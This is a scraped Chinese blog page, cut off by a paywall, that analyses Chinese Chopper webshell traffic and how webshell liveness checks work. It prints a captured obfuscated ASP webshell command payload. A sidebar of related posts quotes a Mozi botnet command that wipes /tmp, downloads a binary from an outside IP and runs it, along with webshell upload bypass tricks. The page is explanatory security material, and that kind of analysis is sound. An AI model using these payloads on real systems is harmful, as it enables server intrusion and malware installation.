【Python】多线程getwebshell+存活检测+菜刀发包协议+源码分析

最新推荐文章于 2024-06-08 09:54:53 发布
最新推荐文章于 2024-06-08 09:54:53 发布
阅读量2.4w 收藏 1
点赞数 2
分类专栏: Python 原创作品
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lzy98/article/details/54911290
版权
在此之前不得不先普及一下webshell存活检测的原理
为了我错了不少功课,对两款菜刀以及市面上3款webshell存活检测工具抓包分析
发现其中一款菜刀存在后门,3款webshell存活检测工具都存在后门
首先尝试抓包webshell存活检测

如图:


可以看到最下面是base64编码的代码,试着解码看看


结果为  @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-6??Р????
后面乱码了? 不明觉厉


从而得到检测存活性是 执行 对应的代码 ,然后在回显内匹配正确字符
然后从菜刀抓包得到数据 


asp网站 

psot
cmd=%u0045%xec%ute%G%loba%l%%28Replace%28%22Fu%nct%ion%20bd%28by%V%al%20s%29:Fo%r%20i%%3D1%20T%o%20Le%n%28s%29%20S%te%p%202:c%%3DM%id%28s%2Ci%2C2%29:If%20Is%Nu%meric%28M%id%28s%2Ci%2C1%29%29%20T%hen:bd%%3Dbd%4026%40c%hr%28%22%22%4026%40H%22%22%4026%40c%29:E%lse:bd%%3Dbd%4026%40c%hr%28%22%22%4026%40H%22%22%4026%40c%4026%40M%id%28s%2Ci%2B2%2C2%29%29:i%%3Di%2B2:E%nd%20If:Ne%xt:E%nd%20Fu%nct%ion:E%xecu%te%%28bd%%28%22%224F6E204572726F7220526573756D65204E6578743A526573706F6E73652E57726974652022584059223A44696D20533A533D5365727665722E4D61707061746828222F2229266368722839293A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A4572722E436C6561723A456C73653A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E57726974652853293A526573706F6E73652E57726974652022584059223A526573706F6E73652E456E64%22%22%29%%29%22%2C%22%4026%40%22%2Cchr%2838%29%29%29'
url解码后
E%xec%ute%G%loba%l%(Replace("Fu%nct%ion bd(by%V%al s):Fo%r i%=1 T%o Le%n(s) S%te%p 2:c%=M%id(s,i,2):If Is%Nu%meric(M%id(s,i,1)) T%hen:bd%=bd@26@c%hr(""@26@H""@26@c):E%lse:bd%=bd@26@c%hr(""@26@H""@26@c@26@M%id(s,i+2,2)):i%=i+2:E%nd If:Ne%xt:E%nd Fu%nct%ion:E%xecu%te%(bd%(""4F6E204572726F7220526573756D65204E6578743A526573706F6E73652E577269
最低0.47元/天 解锁文章
浪子燕青啦啦啦
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一句话木马拿Shell菜刀原理
悦分享
07-12 1459
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
2020 HW一些payload
qq_22807425的博客
09-20 2850
2020 HW一些payload 0x00 碎碎念 以为监控可以抓0day之类的,结果还是常规老漏洞payload多 印度的ip 多数打的是 &cmd=rm+-rf+/tmp/*;wget+http://27.6.195.86:53062/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 这种 也没啥新鲜的 0x01 收集的 Thinkphp /index.php?s=/Index/\think\a
推荐开源项目:PyShell - 跨平台Python WebShell工具
最新发布
gitblog_00006的博客
06-08 258
推荐开源项目:PyShell - 跨平台Python WebShell工具 项目地址:https://gitcode.com/JoelGMSec/PyShell 项目介绍 PyShell是一款创新的多平台Python WebShell工具,旨在提供一个类似命令行的界面,让你能够远程访问和控制Web服务器。与传统WebShell不同的是,PyShell的核心理念是在服务器端尽量减少代码量,无论是何种...
中国菜刀使用与原理分析
热门推荐
weixin_45597678的博客
12-04 1万+
中国菜刀的功能 中国菜刀的使用 原理分析
技术剖析中国菜刀原理
p656456564545的专栏
11-06 5516
referer:http://www.cnblogs.com/LittleHann/p/3247106.html 用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵 这货就是主界面,环境啥的就随意了,IIS,阿帕奇,阿金科斯都可以,我这里用apache,因为之前搞的是PHP开发,对PHP相对比较熟悉,随机就用PHP的一句话来做实验
php 防菜刀,php菜刀分析学习
weixin_42321940的博客
03-26 153
这里以eval为例我们知道, php中的eval能把字符串当代码执行:eval(‘phpcode‘);注意, 这里的代码要有分号结尾, 我们测试:我们创建一个最简单的SHELL:在post数据位置发送:a=phpinfo()可以看到phpinfo()并没有执行。原来原因是要加 ; 号结速一个语句, 像php语法一样, 语句后面要加 ; 号。这里还有一个问题就是, 输入的 a=phpinfo();...
ProxyLogon:ProxyLogon(CVE-2021-26855 + CVE-2021-27065)Exchange Server RCE(SSRF-> GetWebShell
03-25
ProxyLogon(CVE-2021-26855 + CVE-2021-27065)Exchange Server RCE(SSRF-> GetWebShell) usage : python ProxyLogon . py - - host = exchange . com - - mail = admin @ exchange . com python ProxyLogon ...
GetWebShell
09-29
《GetWebShell:深入理解与防范》 在网络安全领域,"GetWebShell"是一个至关重要的概念,它涉及到网站安全、服务器防护以及恶意攻击者利用的技术手段。本文将深入探讨GetWebShell的含义、工作原理、危害,以及如何...
GetWebshell
11-25
E:\武器库\tool\攻\漏洞利用\程序系统类(Web)
getwebshell
10-06
getwebshell
wireshark分析菜刀。其实并没有看懂。。。。。
weixin_44722125的博客
05-05 1790
wireshark简介 Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。 emmm其实就是抓包 Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。网络封包分析软件的功能可想像成 “电工技师使用电表来量测电流、电压、电阻” 的工作 - 只是将场景移植到网络上,并将电线替换成网络线。在...
python模拟菜刀反弹shell绕过限制【推荐】
09-19
主要介绍了利用python模拟菜刀反弹shell绕过限制,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
渗透测试获取webshell方法总结
u013930899的博客
10-06 3249
本文总结了渗透测试php网站获取webshell的几种方法
PHPwind后台获取Webshell
Flashlm专栏
08-01 3556
发现的一个phpwind漏洞搞的热闹非凡,该漏洞是因为message.php 文件的几个变量未进行过滤造成的。官方已发布补丁,所以我在这里摘一点关于取得管理密码后怎么拿webshell的方法:方式1 模板法 进入后台, 风格模版设置 ,在随便一行写代码记住,这代码必须顶着左边行写,代码前面不可以有任何字符。EOT;eval($a);print 例如,我写完某一行为。.headurl { color
Redis账号获取webshell实战
weixin_44023460的博客
12-08 729
Redis账号获取webshell实战 1.扫描某目标服务器端口信息 通过nmap对某目标服务器进行全端口扫描,发现该目标开放Redis的端口为3357,默认端口为6379端口,再次通过iis put scaner软件进行同网段服务器该端口扫描,如图1所示,获取两台开放该端口的服务器。 图1扫描同网段开放该端口的服务器 2.使用telnet登录服务器 使用命令“telnet ip port”命令...
webshell后门检测原理
weixin_40628059的博客
04-30 6809
一、什么是webshell shell (计算机壳层) 在计算机科学中,Shell俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。Shell 编程跟 java、php 编程一样,只要有一个能编写代码的文本编辑器和一个能解释执行的脚本解释器就可以了。 Linux 的 ...
基于行为分析来发现"未知的Webshell"
刘书的IT博客
11-23 2341
一、 “已知”or “未知” 已知的已知,已知的未知,未知的未知,这个最近安全行业也谈的比较多,目前圈内热炒的“威胁情报”,其实应该属于“已知的未知”,对本地来说是未知威胁,其实是别的地方已经发生过的威胁。真正的“未知的未知”怎么办,虽然从没发生过的威胁首次在我们身上发生的概率很小很小,但是目前好多攻击都是窃取管理员的身份或者合法用户身份去做一些貌似合法的操作,这些内部发生的“异常”行为,没
制作属于自己的过狗菜刀:为菜刀添加接口
weixin_30929195的博客
01-23 968
前言 中国菜刀是一个一句话连接工具,最后一版编译于20141213,时至今日仍然是一款优秀的工具。虽然菜刀本身在与服务器通信的时候做了二次编码,但到现在已经被各种WAF杀成狗。而菜刀也是没有开源的,今天就来给大家讲讲二次开发菜刀,为菜刀添加接口。 定位发送函数 下断点:HttpSendRequestW,连接一句话之后,断下来,查看调用堆栈。回溯发现call 0045B330调用了Htt...
菜鸟拿webshell
那年的专栏
10-21 2492
通过几次成功的拿Webshell,发现自己有时也走了一些弯路,为了避免其他的朋友再在困惑中迷失方向,现在我将自己的一些经验写出来,希望对一些想学拿Webshell的朋友有一定的帮助。   首先我们要确定我们要检测的网站,可以是自己定下的某个网站,也可以是自己通过Google或者Baidu搜索得到的,遇到ASP这样的动态网站入侵成功率是最佳的。不详细说了,这一步就是选定目标网站。   然后我们
php如何用菜刀连接getshell,菜刀(代码执行)函数和命令执行函数详解及Getshell方法...
weixin_29730445的博客
03-16 890
@$temp = $_FILES['upload_file']['tmp_name'];@$file = basename($_FILES['upload_file']['name']);if (empty ($file)){echo "\n";echo "Local file: \n";echo "\n";echo "\n\n\n";}else {if(move_uploaded_file($t...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

浪子燕青啦啦啦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值